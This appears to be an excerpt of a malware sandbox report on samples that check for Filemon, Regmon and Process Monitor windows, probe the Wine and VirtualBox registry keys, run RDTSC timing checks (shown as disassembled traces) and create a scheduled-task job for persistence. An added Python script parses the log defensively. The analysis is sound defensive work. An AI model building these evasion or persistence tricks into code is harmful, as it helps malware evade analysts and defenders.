Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3755F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C3755F0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
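The evidence lines in this and the preceding section repeat the same handful of checks for every process instance, which hides the picture: EHDHDHIECG.exe and explorti.exe look for the window classes of Sysinternals Filemon, Regmon and Process Monitor (FilemonClass, RegmonClass, PROCMON_WINDOW_CLASS), probe HKCU\Software\Wine and the VirtualBox ACPI DSDT key, and time pairs of RDTSC instructions; the only boot-survival artefact is the legacy Task Scheduler job file C:\Windows\Tasks\explorti.job. The following Python script is an added example, not part of the report: it parses the report's own "Source: ..." line format, classifies each line as one evasion or persistence technique and counts hits per process. The technique labels are the example's own naming, not the sandbox's signature names, and the sample input is a dozen lines copied from this section (the trailing "Jump to ..." link text of the HTML rendering is tolerated and stripped). Note that NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX), which cmd.exe and many benign programs also set, so the script lists it but it should not be scored as evasion on its own.

```python
import re
from collections import defaultdict

# Added example, not part of the sandbox report: collapse the repetitive
# behaviour lines into one evasion/persistence summary per process.

SOURCE_RE = re.compile(
    r"^Source: (?P<src>\S+) (?P<kind>Window searched|File opened|File created|"
    r"Process information set|RDTSC instruction interceptor): (?P<rest>.*)$")

# Window classes of Sysinternals Filemon, Regmon and Process Monitor (compared case-insensitively,
# since the samples above search both "RegmonClass" and "Regmonclass").
MONITOR_CLASSES = {"filemonclass", "regmonclass", "procmon_window_class"}


def classify(kind: str, rest: str):
    """Map one evidence line to (technique, indicator); None if it is not a signal we track."""
    if kind == "Window searched":
        cls = rest.split("window name: ", 1)[-1].strip()
        if cls.lower() in MONITOR_CLASSES:
            return "monitor-tool window check", cls
    elif kind == "File opened":
        key = rest.strip()
        if key.lower().endswith("\\software\\wine"):
            return "Wine detection (registry)", key
        if "\\acpi\\dsdt\\vbox__" in key.lower():
            return "VirtualBox ACPI table check (registry)", key
    elif kind == "RDTSC instruction interceptor":
        m = re.search(r"First address: (\w+) second address: (\w+)", rest)
        if m:
            return "RDTSC timing check", f"{m.group(1)}->{m.group(2)}"
    elif kind == "Process information set":
        if rest.strip() == "NOOPENFILEERRORBOX":
            # SetErrorMode(SEM_NOOPENFILEERRORBOX): common in benign code, weak on its own
            return "SetErrorMode(SEM_NOOPENFILEERRORBOX)", "NOOPENFILEERRORBOX"
    elif kind == "File created":
        path = rest.strip()
        if path.lower().startswith("c:\\windows\\tasks\\") and path.lower().endswith(".job"):
            return "scheduled task (.job) persistence", path
    return None


def summarise(lines):
    """process basename -> technique -> {indicator: hit count}"""
    summary = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
    for line in lines:
        line = re.sub(r"\s*Jump to (behavior|dropped file)\s*$", "", line.strip())
        m = SOURCE_RE.match(line)
        if not m:
            continue
        hit = classify(m["kind"], m["rest"])
        if hit is None:
            continue
        proc = m["src"].rsplit("\\", 1)[-1]
        technique, indicator = hit
        summary[proc][technique][indicator] += 1
    return {p: {t: dict(i) for t, i in ts.items()} for p, ts in summary.items()}


def format_summary(summary) -> str:
    out = []
    for proc, techniques in sorted(summary.items()):
        out.append(proc)
        for technique, indicators in sorted(techniques.items()):
            hits = ", ".join(f"{ind} x{n}" for ind, n in sorted(indicators.items()))
            out.append(f"  {technique}: {hits}")
    return "\n".join(out)


# Sample input: twelve lines copied from this report (the real section has hundreds).
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB61 second address: 73EB67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
""".strip().splitlines()

if __name__ == "__main__":
    print(format_summary(summarise(SAMPLE_LINES)))
```

Feed it the whole report (one evidence line per input line) and the dropped-DLL noise falls away, leaving per-process counts that map directly onto the anti-analysis and persistence signatures in the overview; processes with no tracked signal, such as ukuWaeRgPR.exe in the sample, do not appear at all.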
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB61 second address: 73EB67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB67 second address: 73EB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD98h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB83 second address: 73EB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB27 second address: 8CAB35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FEE851EFD86h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB35 second address: 8CAB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB3B second address: 8CAB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FEE851EFD8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB49 second address: 8CAB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEE84E88FCEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB57 second address: 8CAB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FEE851EFDB2h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C9D74 second address: 8C9D93 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE84E88FDAh 0x00000008 jmp 00007FEE84E88FD2h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA46C second address: 8CA473 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA473 second address: 8CA498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FEE84E88FD9h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA498 second address: 8CA4A2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE851EFD86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA4A2 second address: 8CA4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC5A9 second address: 73EB61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 674EC9FAh 0x00000010 and ecx, dword ptr [ebp+122D2B99h] 0x00000016 push dword ptr [ebp+122D058Dh] 0x0000001c mov ecx, dword ptr [ebp+122D2BA1h] 0x00000022 call dword ptr [ebp+122D2D09h] 0x00000028 pushad 0x00000029 pushad 0x0000002a push edx 0x0000002b mov esi, dword ptr [ebp+122D29A5h] 0x00000031 pop esi 0x00000032 movsx ecx, bx 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 cmc 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d stc 0x0000003e mov dword ptr [ebp+122D2A8Dh], eax 0x00000044 mov dword ptr [ebp+122D19CEh], ecx 0x0000004a mov esi, 0000003Ch 0x0000004f cmc 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 stc 0x00000055 lodsw 0x00000057 jl 00007FEE851EFD87h 0x0000005d clc 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 call 00007FEE851EFD96h 0x00000068 mov ecx, dword ptr [ebp+122D2CE1h] 0x0000006e pop eax 0x0000006f jmp 00007FEE851EFD8Bh 0x00000074 popad 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jno 00007FEE851EFD87h 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC643 second address: 8CC676 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEE84E88FC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FEE84E88FCFh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007FEE84E88FCDh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC676 second address: 8CC685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC7AF second address: 8CC7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC7B5 second address: 8CC86C instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 55D2D691h 0x00000013 xor edx, 409D5CF5h 0x00000019 push 00000003h 0x0000001b jmp 00007FEE851EFD96h 0x00000020 or dword ptr [ebp+122D1A2Ah], esi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007FEE851EFD88h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 push 00000003h 0x00000044 mov edi, dword ptr [ebp+122D2D9Ah] 0x0000004a call 00007FEE851EFD89h 0x0000004f jnp 00007FEE851EFD92h 0x00000055 push eax 0x00000056 pushad 0x00000057 jmp 00007FEE851EFD90h 0x0000005c pushad 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f jc 00007FEE851EFD86h 0x00000065 popad 0x00000066 popad 0x00000067 mov eax, dword ptr [esp+04h] 0x0000006b push eax 0x0000006c push edx 0x0000006d push edi 0x0000006e jmp 00007FEE851EFD96h 0x00000073 pop edi 0x00000074 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC86C second address: 8CC871 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC871 second address: 8CC8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FEE851EFD90h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FEE851EFD91h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c popad 0x0000001d pop eax 0x0000001e jmp 00007FEE851EFD93h 0x00000023 lea ebx, dword ptr [ebp+1246150Ah] 0x00000029 movsx edi, ax 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jl 00007FEE851EFD88h 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC92D second address: 8CC93E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC93E second address: 8CC9EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE851EFD8Ch 0x00000008 jo 00007FEE851EFD86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D321Fh], edi 0x00000017 movsx esi, cx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FEE851EFD88h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov ch, 82h 0x00000038 mov edx, dword ptr [ebp+122D2B35h] 0x0000003e push 8B3CBEFBh 0x00000043 jmp 00007FEE851EFD8Fh 0x00000048 add dword ptr [esp], 74C34185h 0x0000004f push ebx 0x00000050 mov edi, esi 0x00000052 pop edx 0x00000053 push 00000003h 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FEE851EFD88h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f push 00000000h 0x00000071 mov ecx, dword ptr [ebp+122D2A2Dh] 0x00000077 push 00000003h 0x00000079 mov di, 1E7Dh 0x0000007d push EF340851h 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007FEE851EFD8Fh 0x00000089 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC9EB second address: 8CC9F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC9F1 second address: 8CCA42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 2F340851h 0x00000012 mov dword ptr [ebp+122D1A54h], edi 0x00000018 lea ebx, dword ptr [ebp+12461515h] 0x0000001e jmp 00007FEE851EFD8Ch 0x00000023 mov dl, bl 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jg 00007FEE851EFD86h 0x0000002f ja 00007FEE851EFD86h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CCA42 second address: 8CCA6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEE84E88FC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE84E88FD8h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CCA6B second address: 8CCA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBAC2 second address: 8EBAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBD75 second address: 8EBD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBD7D second address: 8EBD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEE84E88FC6h 0x0000000a jc 00007FEE84E88FC6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBD94 second address: 8EBD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC34F second address: 8EC354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC354 second address: 8EC386 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEE851EFD9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEE851EFD8Eh 0x0000000f ja 00007FEE851EFD86h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC386 second address: 8EC3AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FEE84E88FCAh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC3AE second address: 8EC3BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ECC41 second address: 8ECC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8E4588 second address: 8E459F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEE851EFD86h 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FEE851EFD86h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8E459F second address: 8E45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEE84E88FCFh 0x0000000e jne 00007FEE84E88FCCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ECD93 second address: 8ECD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED2F7 second address: 8ED2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED2FB second address: 8ED30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEE851EFD8Ch 0x0000000c jnp 00007FEE851EFD86h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED775 second address: 8ED77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED77E second address: 8ED782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED782 second address: 8ED7B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FEE84E88FCDh 0x0000000d pushad 0x0000000e jmp 00007FEE84E88FD9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8E45BF second address: 8E45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8F36D9 second address: 8F36E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
